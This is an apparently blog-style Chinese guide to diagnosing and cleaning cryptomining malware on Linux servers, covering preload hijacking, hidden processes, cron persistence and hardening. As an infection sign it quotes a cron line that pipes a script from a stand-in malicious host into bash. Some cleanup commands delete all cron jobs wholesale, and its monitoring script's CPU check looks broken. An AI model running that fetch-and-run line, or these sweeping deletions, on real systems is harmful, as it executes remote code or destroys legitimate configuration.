Linux系统遭遇挖矿病毒深度排查与根治指南
1. 挖矿病毒入侵的典型症状与初步判断
最近接手了几台CPU飙到100%的Linux服务器,登录后top命令一看,居然没有明显的高占用进程。这种情况十有八九是挖矿病毒在作祟——它们会伪装成系统进程,甚至修改系统工具的输出结果来隐藏自己。我见过最狡猾的病毒会把top、ps这些命令都给劫持了,让你看到的永远是"岁月静好"的假象。
遇到这种情况先别慌,教你几个快速验证的方法。首先用cat /etc/ld.so.preload看看有没有异常的.so文件,挖矿病毒最喜欢在这里做手脚。去年处理的一个案例中,就发现病毒注入了libprocesshider.so来隐藏进程。另一个特征是/tmp目录下会突然出现一堆名字随机的可执行文件,这些往往是病毒的下载器。
更明显的迹象是计划任务被篡改。用crontab -l检查时,如果看到类似* * * * * curl -s http://malicious.site/script.sh | bash这样的任务,基本可以确诊。有次我在客户的服务器上发现病毒创建了十几个cronjob,每分钟就从不同域名下载payload。
2. 深度排查隐藏进程的实战技巧
2.1 绕过病毒伪装的检查方法
当top显示一切正常但CPU爆满时,可以尝试这些未被病毒污染的检查方式:
# 使用busybox版的系统命令(病毒通常不会感染这些) busybox top busybox ps aux # 检查不可解释的网络连接 ss -tulnp | grep -E '([0-9]{1,3}\.){3}[0-9]' lsof -i :3333 # 挖矿常用端口去年有个客户的服务器,用普通ps查不到异常,但用busybox ps就揪出了伪装成[kworker]的挖矿进程。病毒修改了/usr/bin/ps的输出过滤逻辑,真是防不胜防。
2.2 通过系统文件验证进程真实性
所有进程在/proc目录都有对应记录,这里的数据病毒很难完全伪造:
# 对比进程列表与实际运行程序 ls -alh /proc/*/exe 2>/dev/null | grep deleted ls -alh /proc/*/cwd # 查看进程工作目录 # 检查异常的内存映射 for pid in $(ls /proc | grep '^[0-9]'); do if grep -q 'libprocesshider' /proc/$pid/maps 2>/dev/null; then echo "发现隐藏进程: $pid" fi done曾经通过/proc/pid/exe的对比,发现某个"sshd"进程实际指向的是/tmp下的恶意文件,这才顺藤摸瓜找到了病毒本体。
3. 顽固病毒pamdicks的专项清除方案
3.1 彻底清除病毒文件
pamdicks这类病毒之所以难缠,是因为它会:
- 替换系统关键命令(如chattr、lsmod)
- 植入内核模块
- 设置文件不可修改属性
完整清除步骤应该是:
# 先恢复被篡改的系统命令 yum reinstall coreutils procps -y # CentOS apt-get --reinstall install coreutils procps -y # Ubuntu # 删除病毒文件前需要解除属性锁定 chattr -i /usr/bin/pamdicks 2>/dev/null rm -f /usr/bin/pamdicks rm -f /etc/ld.so.preload # 清除动态链接劫持 # 检查内核模块 lsmod | grep -E 'pamdicks|libprocesshider'3.2 防止病毒死灰复燃
清除后要做加固处理:
# 创建防写占位文件 touch /usr/bin/pamdicks chmod 000 /usr/bin/pamdicks chattr +i /usr/bin/pamdicks # 清理定时任务 systemctl stop cron rm -f /var/spool/cron/* rm -f /etc/cron.d/* systemctl start cron记得检查/etc/rc.local、/etc/profile这些启动项,病毒经常在这里埋后门。有次清理完三天后病毒又复活了,最后发现是/etc/profile.d里藏了下载脚本。
4. 系统加固与持续监控方案
4.1 关键防护措施实施
清除病毒只是开始,真正的挑战是防止再次感染。建议配置:
# 关键目录监控 echo '/usr/bin /etc /tmp /var/spool/cron' >> /etc/audit/rules.d/monitor.rules auditctl -R /etc/audit/rules.d/monitor.rules # 限制可疑目录执行权限 chmod -R o-x /tmp chmod -R o-x /dev/shm # 安装入侵检测工具 yum install aide -y aide --init mv /var/lib/aide/aide.db.new.gz /var/lib/aide/aide.db.gz4.2 自动化监控脚本示例
这个脚本可以定期检查常见挖矿病毒特征:
#!/bin/bash check_items=( "/etc/ld.so.preload" "/usr/bin/pamdicks" "/tmp/.X11-unix" "libprocesshider" ) for item in "${check_items[@]}"; do if [ -f "$item" ] || grep -qr "$item" /proc/[0-9]*/maps 2>/dev/null; then echo "[$(date)] 发现可疑项目: $item" >> /var/log/virus_scan.log wall "警告:检测到挖矿病毒特征 $item" fi done # 检查异常CPU使用 if [ $(top -bn1 | grep "Cpu(s)" | awk '{print 100 - $8}') -gt 90 ]; then if ! top -bn1 | head -20 | grep -qE '(java|nginx|mysql)'; then echo "[$(date)] 高CPU占用告警" >> /var/log/virus_scan.log fi fi建议放到cron里每小时跑一次。去年用这个脚本帮客户提前发现了正在传播的病毒,当时CPU刚升到40%就被拦截了。